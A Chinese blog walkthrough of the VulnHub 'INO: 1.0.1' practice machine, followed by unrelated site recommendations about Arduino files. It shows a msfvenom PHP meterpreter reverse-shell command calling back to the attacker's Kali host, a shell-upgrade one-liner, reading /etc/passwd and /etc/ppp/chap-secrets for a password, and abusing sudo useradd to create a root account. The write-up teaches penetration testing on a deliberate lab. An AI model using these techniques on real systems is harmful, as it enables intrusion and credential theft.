vulnhub之INO:1.0.1渗透测试

最新推荐文章于 2024-01-31 10:45:53 发布
最新推荐文章于 2024-01-31 10:45:53 发布
阅读量1k 收藏 4
点赞数 3
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guo15890025019/article/details/115299915
版权

目录

1、 靶机概述

Description
Back to the Top
Level: Easy
flags: user, root
Description: This machine require a low skill to get user flag, a little more skill to escalate to root!
Author: foxlox
About VM: VirtualBox ready, the adapter is currently Bridged, DHCP active
链接: 靶机地址.
靶机和Kali虚拟机均同处在VMnet8的虚拟网卡下且使用NAT模式
Kali地址: 192.168.29.131
靶机地址:192.168.29.133

2、环境搭建

虚拟机加载下载的靶机包,启动靶机成功,此时,不知道登录密码和靶机IP地址。
在这里插入图片描述
Kali中使用arp-scan -l扫描靶机地址,但没扫描到。
在这里插入图片描述
继续使用nmap -sn 192.168.29.0/24进行扫描,还是没有扫描到靶机地址。
在这里插入图片描述
使用netdiscover -i eth0 -r 192.168.29.0/24,也是没扫到。
在这里插入图片描述

百度上搜索了一下为什么vuln靶机获取不到P地址,原来是因为网卡服务启动失败,具体如何设置使其获取IP地址,可以参考 这篇文章:Vulnhub靶机检测不到IP地址
设置完后,重新扫描,扫描到靶机地址。
在这里插入图片描述

3、信息收集

扫描靶机端口和服务,可知靶机开启了22和80端口。
在这里插入图片描述
登录192.168.29.133:80会跳转到291.68.29.133/lot路径下
在这里插入图片描述
页面并没有可利用的地方,接着进行后台路径扫描。
dirb http://192.168.29.133只扫描树index.php(跳转到/lot目录);接着进行二级目录扫描dirb http://192.168.29.133/lot发现了/lot/admin /lot/assets /lot/css /lot/database等目录。
访问/lot/database路径,发现有一个sql脚本,将其download下来打开,看看有没有敏感信息。
在这里插入图片描述
在sql脚本中,查看到用户名和密码,怀疑是web登录的用户名和密码。
在这里插入图片描述
将密码解密
在这里插入图片描述

4、获取shell

登录页面,发现存在上传功能。
在这里插入图片描述
在这里插入图片描述
使用msfvenom生成一个php马msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.29.131 lport=1234 -o shell.php
将其上传到服务器,通过burpsuite抓包,没有抓到存放的目录,但访问/lot/admin/assets目录发现存在上传目录
在这里插入图片描述
在这里插入图片描述
kali开启msf监听,然后访问上传的php文件,kali与靶机建立连接。

在这里插入图片描述
拿到shell后第1件事就是获取一个标准shell,可通过以下命令获取python -c 'import pty; pty.spawn("/bin/bash")'
在这里插入图片描述

5、提权

由于获取的web账户权限很低,需要继续获取高权限用户,继而获取root权限。

获取高权限用户

cat /etc/passwd查看一下系统存在的用户
在这里插入图片描述
发现一个用户ppp,我们需要获取该用户的权限,继续信息收集,find /etc -name ppp搜索一下有关ppp的信息,发现/etc下存在ppp目录。/etc/ppp目录下查看chap-secrets文件,发现貌似ppp用户密码的一串字符串。
在这里插入图片描述
使用su 切换,登录ppp账户成功
在这里插入图片描述
在/home/ppp目录下找到flag
在这里插入图片描述

获取root权限

使用sudo -l 查询有哪些sudo权限命令
在这里插入图片描述
可以使用/usr/sbin/useradd 添加一个root权限用户
使用命令即可添加1个用户名为hacker,密码为123456的root权限用户
在这里插入图片描述
su hacker登录,获取root权限
在这里插入图片描述
在/etc下找到flag
在这里插入图片描述

Passer798
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
docker-ino:Ino的Docker映像
05-21
码头工人Ino是用于Arduino硬件的命令行工具包。 docker映像可帮助您在docker中运行ino以达到目的。快速开始将以下别名设置保存在〜/ .profile或〜/ .bashrc中: $ alias ino='sudo docker run --privileged \\\n -v ...
Vulnhub: INO: 1.0.1靶机
qq_43884092的博客
09-04 124
万能密码登录后台,后台任意文件上传,ppp用户密码泄露,useradd创建root权限用户
vulhub | vulhub安装教程,有这一篇就够了~(详细图解)
最新发布
鱼溯的博客
01-31 4501
vulhub | vulhub安装教程,有这一篇就够了,包含Centos和kali的安装,以及docker与docke-compose的详细命令(详细图解)
vulnhub-ino
yutianovo的博客
12-27 444
靶机描述 Level: Easy flags: user, root Description: This machine require a low skill to get user flag, a little more skill to escalate to root! Author: foxlox About VM: VirtualBox ready, the adapter is currently Bridged, DHCP active You can contact me by email
Vulnhub靶机找不到IP解决办法(炒鸡全面)
weixin_43738494的博客
05-28 1170
2.遇到/etc/network/interfaces文件为空的情况,一般都是被netplan软件接管了网卡管理,这时应该进入/etc/netplan文件夹下,就可以看到一个00-netplan.yaml之类的配置文件(具体记不太清了),在这个文件里面将网卡名称改成 命令 ip a 显示的名称就可以啦。3.以上的方法应该能够解决95%的靶机检测不到ip的问题,剩下的5%我还没碰到过...,不过,这时有的同学会发现靶机虽然arp能够探测到,但是nmap扫不到。
ino:等宽字体
02-05
标题中的“ino”可能指的是Ino,这是一个基于Arduino的开发环境,它提供了简洁的用户界面和一些额外的工具,用于编写和上传Arduino程序。Ino项目可能包含了一套专为编程和开发环境设计的等宽字体,以便提升开发者在...
du-ino:DU-INO Arduino
05-10
DU-INO Arduino库概述这是DU MDLR Eurorack模块的官方Arduino库。入门下载适用于您系统的 。 在Arduino IDE库管理器(工具-管理库)中,安装DU-INO库。 开始骇客! 如果Arduino IDE无法提供的DU-INO库,则可以通过...
SAMPLE_INO:.ino项目的一些示例
02-14
在Arduino编程环境中,`.ino`文件是主要的代码编写文件,它实际上是基于C++语言的。这个名为"SAMPLE_INO"的项目很可能包含了多个`.ino`文件,它们是为了展示如何在Arduino平台上进行开发和实现各种功能。让我们深入...
Arduino:我的Arduino测试脚本
03-13
"Arduino-master"这个压缩包可能包含了一个完整的项目结构,包括多个Arduino程序文件(INO文件),每个文件对应一个特定的测试或功能,如超声波传感器测试、伺服电机控制、蜂鸣器播放音乐等。用户可以通过解压文件并...
牛马左前轮测试.ino
04-04
牛马左前轮测试.ino
螺旋仪模块测试.ino
01-04
螺旋仪模块测试.ino
ControlDeCasa_ino_
09-29
【标题】"ControlDeCasa_ino_" 指的可能是一个基于Arduino的智能家居控制系统,其核心代码文件可能被命名为 "ControlDeCasa.ino"。"ino" 是Arduino编程平台特有的后缀名,用于表示Arduino Sketch(项目)的源代码...
Midi_ASCIITable.ino_
10-04
标题"Midi_ASCIITable.ino_"所对应的项目是一个Arduino编程相关的文件,名为"ASCIITable.ino"。这通常意味着它是一个基于Arduino IDE编写的源代码文件,用于实现特定的功能,可能与ASCII表格的生成或显示有关。在...
Ino-L:Windows的简单编程语言。-开源
04-25
Ino-L是Windows的TUI编程语言,可编译成MS-DOS批处理文件。 Ino-L代表Innova Language,因为Innova是创新的法语。 该语言的目的是允许程序员使用批处理文件的相同功能,但是语法更简单,GUI有限,以及MS-DOS本身不...
vulnhub靶机检测不到IP地址解决办法
热门推荐
liver100day的博客
07-26 1万+
vulnhub靶机检测不到IP地址1.无法检测到IP问题2.查询问题原因3.解决问题3.1 重新配置虚拟网络3.2 启动网卡服务4.Kali连不上网解决办法 1.无法检测到IP问题 vulnhub是一个非常棒的靶机平台,里面有许多的靶机资源。当我们下载靶机完毕,准备进行测试学习的时候,使用Mac&kali无法检测到靶机的IP,arp-scan、nmap、netdiscover等命令时均未检测到靶机的IP地址,因为我们无法获取靶机的IP地址的话就没办法进行下一步。 2.查询问题原因 确保攻击机与靶机同
VulnHub渗透实战--Billu_b0x
crispr的博客
02-05 981
Billu_b0x 0X01 Main Point 1.简单的代码审计 2. 文件包含漏洞(LFI) 读取源码 3. 文件上传得到webshell 4. Linux内核提权(Ubuntu 12.04) 5. SQLI 0X02 前期嗅探和端口探测 arp-scan -l #得到靶机IP nmap -sV -A -p- 172.20.10.3 #探测靶机端口及系统情况 常规的开放...
vulnhub-BBS (CUTE): 1.0.1-cute
yutianovo的博客
09-25 619
http://blog.yutian233.xyz/index.php/archives/63/ 靶机描述 Machine name: BBS (Bulletin Board System) Level: Easy->Intermediate flags: user, root Description: really technical machine, if you are ready for certifications it will be a good tool to test your
包解决vulnhub靶机获取不到IP地址
shelbytt的博客
10-01 2968
vulnhub靶机获取不到IP地址很多解决方法都能找到,但是最终我还是没有获取到靶机ip,所以自己研究了下,搞了好久终于搞出来了
E:\arduinofile\arduinofile.ino: In function 'void loop()': E:\arduinofile\arduinofile.ino:19:19: error: expected primary-expression before '.' token int ret = dht11.read(); ^ E:\arduinofile\arduinofile.ino:29:24: error: 'AI2' was not declared in this scope float m1= analogRead(AI2); ^~~ E:\arduinofile\arduinofile.ino:29:24: note: suggested alternative: 'A2' float m1= analogRead(AI2); ^~~ A2 E:\arduinofile\arduinofile.ino:30:24: error: 'AI3' was not declared in this scope float m2= analogRead(AI3); ^~~ E:\arduinofile\arduinofile.ino:30:24: note: suggested alternative: 'A3' float m2= analogRead(AI3); ^~~ A3 E:\arduinofile\arduinofile.ino:33:30: error: expected primary-expression before '.' token Serial.print((float)dht11.getTemperature(), 2); ^ E:\arduinofile\arduinofile.ino:35:31: error: expected primary-expression before '.' token Serial.print((float)dht11.getHumidity(), 2); ^ exit status 1 Compilation error: expected primary-expression before '.' token
05-30
这个错误通常是因为你的代码中使用了错误的语法或语法错误。具体来说,有以下几个可能的原因: 1. 在调用函数时,你没有使用正确的语法。在 Arduino 中,调用函数时需要使用点运算符(`.`)或箭头运算符(`->`),具体取决于你是使用对象还是指针来调用函数。例如: ``` // 使用对象调用函数 dht11.read(); float temp = dht11.getTemperature(); // 使用指针调用函数 DHT11 *ptr = &dht11; ptr->read(); float temp = ptr->getTemperature(); ``` 2. 你使用了错误的变量名或常量名。例如,你可能在代码中使用了 `AI2` 或 `AI3`,但实际上应该是使用 `A2` 或 `A3`。 3. 你的代码中缺少必要的头文件或库文件。例如,在使用 `dht11` 对象时,你需要包含 `DHT11.h` 头文件。在使用 `Serial` 对象时,你需要包含 `SoftwareSerial.h` 或 `HardwareSerial.h` 头文件。 检查以上几个问题,修改错误的语法或名称,并确保你的代码中包含了必要的头文件和库文件,即可解决编译错误。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值